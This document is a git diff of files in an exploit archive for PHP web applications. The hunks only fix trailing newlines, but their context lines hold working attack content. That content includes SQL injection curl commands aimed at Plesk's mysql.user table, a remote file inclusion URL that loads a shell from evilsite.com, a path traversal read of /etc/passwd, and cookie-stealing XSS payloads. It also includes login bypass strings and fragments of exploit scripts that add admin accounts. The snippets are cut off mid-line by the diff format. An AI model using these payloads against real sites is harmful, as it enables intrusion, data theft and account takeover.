+++ b/platforms/php/webapps/30555.txt @@ -43,4 +43,4 @@ http://victim.com/mkportal/cache/ppage_*.php where * is the ID of the page. Translate "page" in MKPortal language. -Example: "pagina" for italian sites. +Example: "pagina" for italian sites. \ No newline at end of file diff --git a/platforms/php/webapps/30557.txt b/platforms/php/webapps/30557.txt index 12f944148..a29ee7406 100755 --- a/platforms/php/webapps/30557.txt +++ b/platforms/php/webapps/30557.txt @@ -7,4 +7,4 @@ An attacker could exploit these issues to execute local script code in the conte Versions prior to Claroline 1.8.6 are vulnerable. http://www.example.com/admin/adminusers.php?dir=[XSS] -http://www.example.com/admin/adminusers.php?sort=[XSS] +http://www.example.com/admin/adminusers.php?sort=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/3057.php b/platforms/php/webapps/3057.php index f5660d0c5..d58105283 100755 --- a/platforms/php/webapps/3057.php +++ b/platforms/php/webapps/3057.php @@ -425,4 +425,4 @@ echo "Check register_globals = On and magic_quotes_gpc = off\n"; echo "Go to DEVIL TEAM IRC: irc.milw0rm.com:6667 #devilteam\r\n"; ?> -# milw0rm.com [2006-12-31] +# milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/30573.txt b/platforms/php/webapps/30573.txt index f2472de9d..e895a884b 100755 --- a/platforms/php/webapps/30573.txt +++ b/platforms/php/webapps/30573.txt @@ -7,5 +7,4 @@ An attacker can exploit this issue to download arbitrary files within the contex This issue affects SisfoKampus 2006; other versions may also be vulnerable. -http://www.example.com/dwoprn.php?f=connectdb.php - +http://www.example.com/dwoprn.php?f=connectdb.php \ No newline at end of file diff --git a/platforms/php/webapps/30576.txt b/platforms/php/webapps/30576.txt index 2cdeac717..ebec1f14d 100755 --- a/platforms/php/webapps/30576.txt +++ b/platforms/php/webapps/30576.txt @@ -7,5 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br These issues affects BOINC 5.10.20; other versions may also be affected. http://www.example.com/forum_text_search_action.php?search_string=[XSS]&titles=Search -http://www.example.com/forum_text_search_action.php?search_string=[XSS]&bodies=Search - +http://www.example.com/forum_text_search_action.php?search_string=[XSS]&bodies=Search \ No newline at end of file diff --git a/platforms/php/webapps/30577.txt b/platforms/php/webapps/30577.txt index 3a590a198..52463a150 100755 --- a/platforms/php/webapps/30577.txt +++ b/platforms/php/webapps/30577.txt @@ -34,4 +34,4 @@ from mysql.user/*" Curl.exe -k "https://www.???.com:8443/login.php3" --cookie "PLESKSESSID=1' union select if (substring(user,5,1)=char(110),BENCHMARK(3000000,MD5(CHAR(1))),null),2,3 -from mysql.user/*" +from mysql.user/*" \ No newline at end of file diff --git a/platforms/php/webapps/3059.txt b/platforms/php/webapps/3059.txt index 5bd90a72c..da3343855 100755 --- a/platforms/php/webapps/3059.txt +++ b/platforms/php/webapps/3059.txt @@ -36,4 +36,4 @@ SP TNX : Dr.Pantagon ********************************************************************************************************** -# milw0rm.com [2006-12-31] +# milw0rm.com [2006-12-31] \ No newline at end of file diff --git a/platforms/php/webapps/30623.pl b/platforms/php/webapps/30623.pl index 835c0dd5c..c4aefa7d6 100755 --- a/platforms/php/webapps/30623.pl +++ b/platforms/php/webapps/30623.pl @@ -315,4 +315,4 @@ $!\n"; sub usage() { printf "usage: %s \n", $0; exit; -} +} \ No newline at end of file diff --git a/platforms/php/webapps/30637.js b/platforms/php/webapps/30637.js index fb1b05060..1795debe3 100755 --- a/platforms/php/webapps/30637.js +++ b/platforms/php/webapps/30637.js @@ -29,4 +29,4 @@ feedburner_csrf = function(t, p) { }; -feedburner_csrf(t,p); +feedburner_csrf(t,p); \ No newline at end of file diff --git a/platforms/php/webapps/30664.txt b/platforms/php/webapps/30664.txt index ff9f6f35d..e65837083 100755 --- a/platforms/php/webapps/30664.txt +++ b/platforms/php/webapps/30664.txt @@ -4,4 +4,4 @@ Scott Manktelow Design Stride 1.0 Merchant is prone to an SQL-injection vulnerab Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/shop.php?cmd=sto&id=[SQL] +http://www.example.com/shop.php?cmd=sto&id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/30698.txt b/platforms/php/webapps/30698.txt index 35de4ebe8..d9f30e29f 100755 --- a/platforms/php/webapps/30698.txt +++ b/platforms/php/webapps/30698.txt @@ -31,5 +31,4 @@ php&opmod=open&op= Or, for example u can view and edit a file located on the server: http://www.example.com/flatnuke3_path/index.php?mod=none_filemanager&dir=/ -[script_path]/&ffile=[file]&opmod=open&op= - +[script_path]/&ffile=[file]&opmod=open&op= \ No newline at end of file diff --git a/platforms/php/webapps/30745.html b/platforms/php/webapps/30745.html index 501a02420..346e16383 100755 --- a/platforms/php/webapps/30745.html +++ b/platforms/php/webapps/30745.html @@ -17,5 +17,4 @@ An attacker can exploit these issues to gain elevated privileges on the affected

- - + \ No newline at end of file diff --git a/platforms/php/webapps/3075.pl b/platforms/php/webapps/3075.pl index 8c3a9ab64..ab1d683db 100755 --- a/platforms/php/webapps/3075.pl +++ b/platforms/php/webapps/3075.pl @@ -113,4 +113,4 @@ while($cmd !~ "q") { $cmd = ; } -# milw0rm.com [2007-01-03] +# milw0rm.com [2007-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/30750.pl b/platforms/php/webapps/30750.pl index e2728111a..c02b9329c 100755 --- a/platforms/php/webapps/30750.pl +++ b/platforms/php/webapps/30750.pl @@ -116,4 +116,4 @@ print "Hash Bruteforce : " . chr($array[$_[2]]) . "\n"; print "Bruteforce n Caracter Hash : " . $_[5] . "\n"; print "Tiempo sql : " . $_[4] . " secondi\n"; print "Hash : " . $_[3] . "\n"; -} +} \ No newline at end of file diff --git a/platforms/php/webapps/3076.php b/platforms/php/webapps/3076.php index 38696dd35..0c0ecc105 100755 --- a/platforms/php/webapps/3076.php +++ b/platforms/php/webapps/3076.php @@ -617,4 +617,4 @@ class phpsploit { ?> -# milw0rm.com [2007-01-03] +# milw0rm.com [2007-01-03] \ No newline at end of file diff --git a/platforms/php/webapps/30786.txt b/platforms/php/webapps/30786.txt index 1d18d95e4..b5c9f7ccc 100755 --- a/platforms/php/webapps/30786.txt +++ b/platforms/php/webapps/30786.txt @@ -34,4 +34,4 @@ II. Cross Site Scripting localhost/mshwpage/view.php?class= -#################################################################### +#################################################################### \ No newline at end of file diff --git a/platforms/php/webapps/3079.txt b/platforms/php/webapps/3079.txt index 614ee3084..6928c6c27 100755 --- a/platforms/php/webapps/3079.txt +++ b/platforms/php/webapps/3079.txt @@ -26,4 +26,4 @@ + http://[target]/[path]/inc/init.inc.php?current_path=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2007-01-04] +# milw0rm.com [2007-01-04] \ No newline at end of file diff --git a/platforms/php/webapps/30810.txt b/platforms/php/webapps/30810.txt index f6533fe58..2881fb4d8 100755 --- a/platforms/php/webapps/30810.txt +++ b/platforms/php/webapps/30810.txt @@ -9,6 +9,4 @@ Proverbs Web Calendar 1.1 is vulnerable; other versions may also be affected. The following proof of concept is available: Username: admin -Password: ' or - - +Password: ' or \ No newline at end of file diff --git a/platforms/php/webapps/30815.txt b/platforms/php/webapps/30815.txt index 648303a7f..5a2991b20 100755 --- a/platforms/php/webapps/30815.txt +++ b/platforms/php/webapps/30815.txt @@ -6,5 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Tilde 4.0 is vulnerable; other versions may also be affected. -http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS] - +http://www.example.com/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/30817.html b/platforms/php/webapps/30817.html index 03cb4434b..da072a899 100755 --- a/platforms/php/webapps/30817.html +++ b/platforms/php/webapps/30817.html @@ -8,4 +8,4 @@ Liferay Portal 4.3.1 is vulnerable; other versions may also be affected. "> XSS -">
- +
\ No newline at end of file diff --git a/platforms/php/webapps/37464.txt b/platforms/php/webapps/37464.txt index cbddce90d..dd1fd411b 100755 --- a/platforms/php/webapps/37464.txt +++ b/platforms/php/webapps/37464.txt @@ -52,5 +52,4 @@ Timeline ========= 9/06/2015 - Vulnerabilities found. Developer Informed 17/06/2015 - Patch Relased (Version 3.3) -02/07/2015 - Exploit disclosed - +02/07/2015 - Exploit disclosed \ No newline at end of file diff --git a/platforms/php/webapps/37466.php b/platforms/php/webapps/37466.php index d503f02df..19c879d4f 100755 --- a/platforms/php/webapps/37466.php +++ b/platforms/php/webapps/37466.php @@ -27,4 +27,4 @@ Shell Access : http://http://www.example.com/php-fusion/infusions/mp3player_pane lo.php.mp3 +?> \ No newline at end of file diff --git a/platforms/php/webapps/37468.php b/platforms/php/webapps/37468.php index df2e8e6ff..bc5ef13a6 100755 --- a/platforms/php/webapps/37468.php +++ b/platforms/php/webapps/37468.php @@ -21,4 +21,4 @@ curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/3747.txt b/platforms/php/webapps/3747.txt index 7f5333638..e3dc57f30 100755 --- a/platforms/php/webapps/3747.txt +++ b/platforms/php/webapps/3747.txt @@ -5,4 +5,4 @@ # Exploit:[Path]/scr/soustab.php?dsn[phptype]=[ Local File ]%00 # Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb -# milw0rm.com [2007-04-16] +# milw0rm.com [2007-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/37472.php b/platforms/php/webapps/37472.php index 0a1a7162f..ea99bc78a 100755 --- a/platforms/php/webapps/37472.php +++ b/platforms/php/webapps/37472.php @@ -19,4 +19,4 @@ curl_close($ch); print "$postResult"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/3748.txt b/platforms/php/webapps/3748.txt index 905535ba1..3b32309e3 100755 --- a/platforms/php/webapps/3748.txt +++ b/platforms/php/webapps/3748.txt @@ -13,4 +13,4 @@ bug found: Exploit: www.target.com/index.php?abs_path=[evilcode] www.target.com/checkout.php?abs_path=[evilcode] -# milw0rm.com [2007-04-16] +# milw0rm.com [2007-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/37485.txt b/platforms/php/webapps/37485.txt index 54e368cd8..7c11204a0 100755 --- a/platforms/php/webapps/37485.txt +++ b/platforms/php/webapps/37485.txt @@ -6,5 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow PHPFreeChat 0.2.8 is vulnerable; other versions may also be affected. -http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E - +http://www.example.com/wordpress/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/3749.txt b/platforms/php/webapps/3749.txt index 0e7f482d8..275270514 100755 --- a/platforms/php/webapps/3749.txt +++ b/platforms/php/webapps/3749.txt @@ -14,4 +14,4 @@ mods/ui_functions.php?GALLERY_BASEDIR=Shell Greetz To: Asb-May.Net/bb -# milw0rm.com [2007-04-16] +# milw0rm.com [2007-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/37498.txt b/platforms/php/webapps/37498.txt index f8f54032d..5e565499b 100755 --- a/platforms/php/webapps/37498.txt +++ b/platforms/php/webapps/37498.txt @@ -40,6 +40,4 @@ http://www.example.com/index.php?admin=1&module=fi lemanager&action=newRepo&file http://www.example.com/index.php?admin=1&module=filemanager&action=newRepo&filemanager_ upload_filter=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/index.php?ad min=1&module=filemanager&action=newRepo&filemanager_view_filter=%22%3E%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E http://www.example.com/index.php?admin=1&module=downloads&action=newArchive&archive_title=%22%3E% 3Cscript%3Ealert%28document.cookie%29;%3C/script%3E -http://www.example.com/index.php?admin=1&module=down loads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E - - +http://www.example.com/index.php?admin=1&module=down loads&action=newArchive&archive_path=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script %3E \ No newline at end of file diff --git a/platforms/php/webapps/3750.txt b/platforms/php/webapps/3750.txt index 665ed5439..8cd614602 100755 --- a/platforms/php/webapps/3750.txt +++ b/platforms/php/webapps/3750.txt @@ -5,4 +5,4 @@ # Exploit:[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell # Greetz To: Tryag.Com/cc & Dwrat.Com & Asb-May.Net/bb -# milw0rm.com [2007-04-16] +# milw0rm.com [2007-04-16] \ No newline at end of file diff --git a/platforms/php/webapps/37500.txt b/platforms/php/webapps/37500.txt index 379b64605..65ca59e2a 100755 --- a/platforms/php/webapps/37500.txt +++ b/platforms/php/webapps/37500.txt @@ -23,5 +23,4 @@ http://www.example.com/funeralscript/admin.php?act=comments&obit_id=[Cross Site http://www.example.com/funeralscript/admin.php?act=comments&obit_id=&orderType=[Cross Site Scripting] http://www.example.com/funeralscript/admin.php?act=comments&obit_id=-1%[Cross Site Scripting] http://www.example.com/funeral_script.php?id=1&p=[Cross Site Scripting]%3C&search=[Cross Site Scripting] -http://www.example.com/funeral_script.php?hide_cat=[Cross Site Scripting] - +http://www.example.com/funeral_script.php?hide_cat=[Cross Site Scripting] \ No newline at end of file diff --git a/platforms/php/webapps/37501.rb b/platforms/php/webapps/37501.rb index 6d81a74f8..f7e19be6e 100755 --- a/platforms/php/webapps/37501.rb +++ b/platforms/php/webapps/37501.rb @@ -110,4 +110,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/platforms/php/webapps/37505.txt b/platforms/php/webapps/37505.txt index 4d25a79ba..4758bfac2 100755 --- a/platforms/php/webapps/37505.txt +++ b/platforms/php/webapps/37505.txt @@ -74,6 +74,4 @@ Review: Edit Membergroups & User/Groups Listing URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=index;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 -URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 - - +URL: http://www.example.com/smf/index.php?action=admin;area=membergroups;sa=add;b74f235ec=2b30f2b9aad6e26815e1c18594922b37 \ No newline at end of file diff --git a/platforms/php/webapps/37506.php b/platforms/php/webapps/37506.php index dad0e3ee3..349b02ec8 100755 --- a/platforms/php/webapps/37506.php +++ b/platforms/php/webapps/37506.php @@ -22,5 +22,4 @@ print "$postResult"; lo.txt - - + \ No newline at end of file diff --git a/platforms/php/webapps/3751.txt b/platforms/php/webapps/3751.txt index a44d040f2..299fdf62b 100755 --- a/platforms/php/webapps/3751.txt +++ b/platforms/php/webapps/3751.txt @@ -10,4 +10,4 @@ -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37515.txt b/platforms/php/webapps/37515.txt index 5fa799ca0..2f1df685f 100755 --- a/platforms/php/webapps/37515.txt +++ b/platforms/php/webapps/37515.txt @@ -169,4 +169,4 @@ contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -(hyp3rlinx) +(hyp3rlinx) \ No newline at end of file diff --git a/platforms/php/webapps/3752.txt b/platforms/php/webapps/3752.txt index f4b7803ff..50d094cc3 100755 --- a/platforms/php/webapps/3752.txt +++ b/platforms/php/webapps/3752.txt @@ -47,4 +47,4 @@ Exploit : ---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37521.txt b/platforms/php/webapps/37521.txt index ff359d550..f35918b93 100755 --- a/platforms/php/webapps/37521.txt +++ b/platforms/php/webapps/37521.txt @@ -30,5 +30,4 @@ $this->security->xss_clean($this->input->post('xss'));
-Launch http://app-uri/index.php/xssdemo and try above vectors. - +Launch http://app-uri/index.php/xssdemo and try above vectors. \ No newline at end of file diff --git a/platforms/php/webapps/3753.txt b/platforms/php/webapps/3753.txt index b8e5806be..2a20cd1e4 100755 --- a/platforms/php/webapps/3753.txt +++ b/platforms/php/webapps/3753.txt @@ -20,4 +20,4 @@ require_once( $mosConfig_absolute_path . #Long Life Palestine #www.Hack-Teach.com , www.Hack-Teach.org -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37530.txt b/platforms/php/webapps/37530.txt index 8089ab5c8..36b8c55b3 100755 --- a/platforms/php/webapps/37530.txt +++ b/platforms/php/webapps/37530.txt @@ -24,4 +24,4 @@ CVEID: Requested TBD OSVDB: TBD Exploit Code: - • $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd + • $ curl http://server/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/3754.pl b/platforms/php/webapps/3754.pl index f12cb6990..280792478 100755 --- a/platforms/php/webapps/3754.pl +++ b/platforms/php/webapps/3754.pl @@ -67,4 +67,4 @@ print "=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= # Sp Tnx : Str0ke -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37547.txt b/platforms/php/webapps/37547.txt index 5fbdd9c11..0174782e8 100755 --- a/platforms/php/webapps/37547.txt +++ b/platforms/php/webapps/37547.txt @@ -33,6 +33,4 @@ Content-Length: 2 #Response 2 http://D.E.F.G/search?hl=en&q=a=1 - - - + \ No newline at end of file diff --git a/platforms/php/webapps/37548.txt b/platforms/php/webapps/37548.txt index 81adb8d24..6aa3716bb 100755 --- a/platforms/php/webapps/37548.txt +++ b/platforms/php/webapps/37548.txt @@ -37,5 +37,4 @@ Content-Type: text/html #Confirming on File System C:\>type "Program Files (x86)\Scrutinizer\snmp\mibs\trustwave.txt" -trustwave - +trustwave \ No newline at end of file diff --git a/platforms/php/webapps/37551.txt b/platforms/php/webapps/37551.txt index d2e4a55c3..3c21134c9 100755 --- a/platforms/php/webapps/37551.txt +++ b/platforms/php/webapps/37551.txt @@ -36,4 +36,4 @@ viewemail=1 &dateformat=D+M+d%2C+Y+g%3Ai+a &submit=Submit &creation_time=1343370877 -&form_token=576... +&form_token=576... \ No newline at end of file diff --git a/platforms/php/webapps/37559.txt b/platforms/php/webapps/37559.txt index bf7480611..e0cbf69af 100755 --- a/platforms/php/webapps/37559.txt +++ b/platforms/php/webapps/37559.txt @@ -58,5 +58,4 @@ time-line 2015-07-10: released CP Image Store with Slideshow new version 1.0.6 2015-07-10: full disclosure -=================================== - +=================================== \ No newline at end of file diff --git a/platforms/php/webapps/3756.txt b/platforms/php/webapps/3756.txt index ef450f561..98a981d33 100755 --- a/platforms/php/webapps/3756.txt +++ b/platforms/php/webapps/3756.txt @@ -16,4 +16,4 @@ -=-=-=-=-=-=-=-=-=-=-=-=-=I=R=A=N=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37560.txt b/platforms/php/webapps/37560.txt index e9cc32573..6340d7e2c 100755 --- a/platforms/php/webapps/37560.txt +++ b/platforms/php/webapps/37560.txt @@ -87,5 +87,4 @@ time-line 2015-07-10: 2015-07-12: -=================================== - +=================================== \ No newline at end of file diff --git a/platforms/php/webapps/37563.html b/platforms/php/webapps/37563.html index 0b5248d15..e68acc47b 100755 --- a/platforms/php/webapps/37563.html +++ b/platforms/php/webapps/37563.html @@ -13,4 +13,4 @@ G-Lock Double Opt-in Manager 2.6.2 and prior versions are vulnerable. - + \ No newline at end of file diff --git a/platforms/php/webapps/37565.txt b/platforms/php/webapps/37565.txt index 22de85665..e79a29fc0 100755 --- a/platforms/php/webapps/37565.txt +++ b/platforms/php/webapps/37565.txt @@ -6,6 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in Mahara versions prior to 1.5.2 and prior to 1.4.3 are vulnerable. - http://www.example.com/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E - - + http://www.example.com/mahara-1.5.1/mahara-1.5.1/htdocs/admin/users/changeuser.php?xss=\x22\x3E\x3C\x68\x31\x3E\x58\x53\x53\x3C\x2F\x68\x31\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x39\x20\x6F\x6E\x65\x72\x72\x6F\x72\x3D\x61\x6C\x65\x72\x74\x28\x22\x58\x53\x53\x22\x29\x3E \ No newline at end of file diff --git a/platforms/php/webapps/37575.txt b/platforms/php/webapps/37575.txt index ecf357241..fc6e8285b 100755 --- a/platforms/php/webapps/37575.txt +++ b/platforms/php/webapps/37575.txt @@ -6,5 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc http://www.example.com.np/index.php?option=com_photo&task=gallery&AlbumId=8[SQL Injection] -http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection] - +http://www.example.com/index.php?option=com_photo&action=slideview&key=16[SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/3758.php b/platforms/php/webapps/3758.php index 80be2a44c..cd0cafe99 100755 --- a/platforms/php/webapps/3758.php +++ b/platforms/php/webapps/3758.php @@ -87,4 +87,4 @@ echo "[ ] Shell Accessible at ".$url."module.php?cmd="; curl_close($ch); ?> -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37582.py b/platforms/php/webapps/37582.py index 131f461d4..e1217b1fd 100755 --- a/platforms/php/webapps/37582.py +++ b/platforms/php/webapps/37582.py @@ -113,5 +113,4 @@ for key in basicInfo: if re.findall("the nvarchar value '", getResp): dbInfo = getResp.split('the nvarchar value '')[1].split('' to data type int')[0] -print "\n(!) Found database %s%s" % (key, dbInfo.rstrip()) - +print "\n(!) Found database %s%s" % (key, dbInfo.rstrip()) \ No newline at end of file diff --git a/platforms/php/webapps/37586.php b/platforms/php/webapps/37586.php index 3a6d6294d..b153e6787 100755 --- a/platforms/php/webapps/37586.php +++ b/platforms/php/webapps/37586.php @@ -93,7 +93,4 @@ echo "| Updating User privileges\n"; $update=get($vic."admin.php?page=member&edit=1&start=1&id=$myid","username=f4ris_$ran&new_username=f4ris_$ran&new_password=sec4ever1337s&email=n0p1337_$ran@gmail.com&usergroup=1&gender=m&style=1&lang=1&avater_path=&user_info=&user_title=F4r54wy&posts=0&website=sec4ever.com&month=0&day=0&year=&user_country=&ip=&warnings=0&reputation=10&hide_online=0&user_time=&send_allow=1&pm_emailed=0&pm_window=1&visitormessage=1&user_sig=&review_subject=0&review_reply=0&submit=%D9%85%D9%88%D8%A7%D9%81%D9%82","PowerBB_admin_username=faris' or id='1; PowerBB_admin_password=faris' or password like '%;PowerBB_username=faris' or id='1;PowerBB_password=faris' or password like '%"); echo "+ Exploitatin Done ;)\n"; exit(); -?> - - - +?> \ No newline at end of file diff --git a/platforms/php/webapps/37588.txt b/platforms/php/webapps/37588.txt index 08157e2f1..0c6071d63 100755 --- a/platforms/php/webapps/37588.txt +++ b/platforms/php/webapps/37588.txt @@ -191,4 +191,4 @@ herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere. -(hyp3rlinx) +(hyp3rlinx) \ No newline at end of file diff --git a/platforms/php/webapps/3759.pl b/platforms/php/webapps/3759.pl index 4978a46c1..3544091ae 100755 --- a/platforms/php/webapps/3759.pl +++ b/platforms/php/webapps/3759.pl @@ -120,4 +120,4 @@ system("start $mysite"); $InfoWindow->Show(); } -# milw0rm.com [2007-04-17] +# milw0rm.com [2007-04-17] \ No newline at end of file diff --git a/platforms/php/webapps/37591.php b/platforms/php/webapps/37591.php index f84d7936d..527e81ad7 100755 --- a/platforms/php/webapps/37591.php +++ b/platforms/php/webapps/37591.php @@ -76,4 +76,4 @@ function stdin(){ fclose($fp); return $line; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/37594.txt b/platforms/php/webapps/37594.txt index f63eb5cba..c72a5c334 100755 --- a/platforms/php/webapps/37594.txt +++ b/platforms/php/webapps/37594.txt @@ -22,4 +22,4 @@ POST parameter "showemail" is vulnerable to error based SQLi attack video : https://youtu.be/5nFblYE90Vk -good luck +good luck \ No newline at end of file diff --git a/platforms/php/webapps/37595.txt b/platforms/php/webapps/37595.txt index 1261ea1fa..0aa5e0267 100755 --- a/platforms/php/webapps/37595.txt +++ b/platforms/php/webapps/37595.txt @@ -19,7 +19,4 @@ exploition can be performed by adding "@@media" to the file name and base64 it t http://domain.tld/stream.php?file=../vibe_config.php@@media ==> http://domain.tld/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09 -===================================== - - - +===================================== \ No newline at end of file diff --git a/platforms/php/webapps/37596.txt b/platforms/php/webapps/37596.txt index 03883a72a..8cd50c95d 100755 --- a/platforms/php/webapps/37596.txt +++ b/platforms/php/webapps/37596.txt @@ -128,4 +128,4 @@ POST 'url' Ping Server Reflected XSS: - + \ No newline at end of file diff --git a/platforms/php/webapps/3760.txt b/platforms/php/webapps/3760.txt index 9ff80c05d..bd1cdf6a5 100755 --- a/platforms/php/webapps/3760.txt +++ b/platforms/php/webapps/3760.txt @@ -21,4 +21,4 @@ + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/37604.txt b/platforms/php/webapps/37604.txt index 9767d4811..2321a5a4c 100755 --- a/platforms/php/webapps/37604.txt +++ b/platforms/php/webapps/37604.txt @@ -153,4 +153,4 @@ Deloitte Conseil Mobile: +33 (0)6 70 97 91 95 Tel: +33 (0)1 58 37 03 72 hdau@deloitte.fr | www.deloitte.fr -Avant d'imprimer, pensez à l'environnement +Avant d'imprimer, pensez à l'environnement \ No newline at end of file diff --git a/platforms/php/webapps/3761.txt b/platforms/php/webapps/3761.txt index a96cc85ec..4039d7e98 100755 --- a/platforms/php/webapps/3761.txt +++ b/platforms/php/webapps/3761.txt @@ -23,4 +23,4 @@ + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/37614.txt b/platforms/php/webapps/37614.txt index 24341c46f..72131ebc5 100755 --- a/platforms/php/webapps/37614.txt +++ b/platforms/php/webapps/37614.txt @@ -45,4 +45,4 @@ PBBoard 2.1.4 is vulnerable; other versions may also be affected.
-
+ \ No newline at end of file diff --git a/platforms/php/webapps/3762.htm b/platforms/php/webapps/3762.htm index baa3addde..b97e7c8cd 100755 --- a/platforms/php/webapps/3762.htm +++ b/platforms/php/webapps/3762.htm @@ -37,4 +37,4 @@ + + -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- --> -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/3763.txt b/platforms/php/webapps/3763.txt index 239e980f0..db6171388 100755 --- a/platforms/php/webapps/3763.txt +++ b/platforms/php/webapps/3763.txt @@ -13,4 +13,4 @@ # Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group # Thanx To : RootShell-Team.Info & Alkomandoz Hacker -# milw0rm.com [2007-04-18] +# milw0rm.com [2007-04-18] \ No newline at end of file diff --git a/platforms/php/webapps/37632.txt b/platforms/php/webapps/37632.txt index d38ea361f..73ac5f1f8 100755 --- a/platforms/php/webapps/37632.txt +++ b/platforms/php/webapps/37632.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br CodeIgniter 2.1.2 is vulnerable; other versions may also be affected. -Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; +Example 1 Request: +----------------- GET /?%00";};alert(String.fromCharCode(120,115,115,116,101,115,116 ));{//=1 HTTP/1.1 Host: www.example.com Referer: http://www.example.com/about --- Example 1 Response: +------------------ --- SNIP --- function refresh_page(){ parent.location="/?%00";};alert(String.fromCharCode(120,115,115 ,116,101,115,116));{//=1"; \ No newline at end of file diff --git a/platforms/php/webapps/37637.pl b/platforms/php/webapps/37637.pl index 17c4c3890..e136abc3c 100755 --- a/platforms/php/webapps/37637.pl +++ 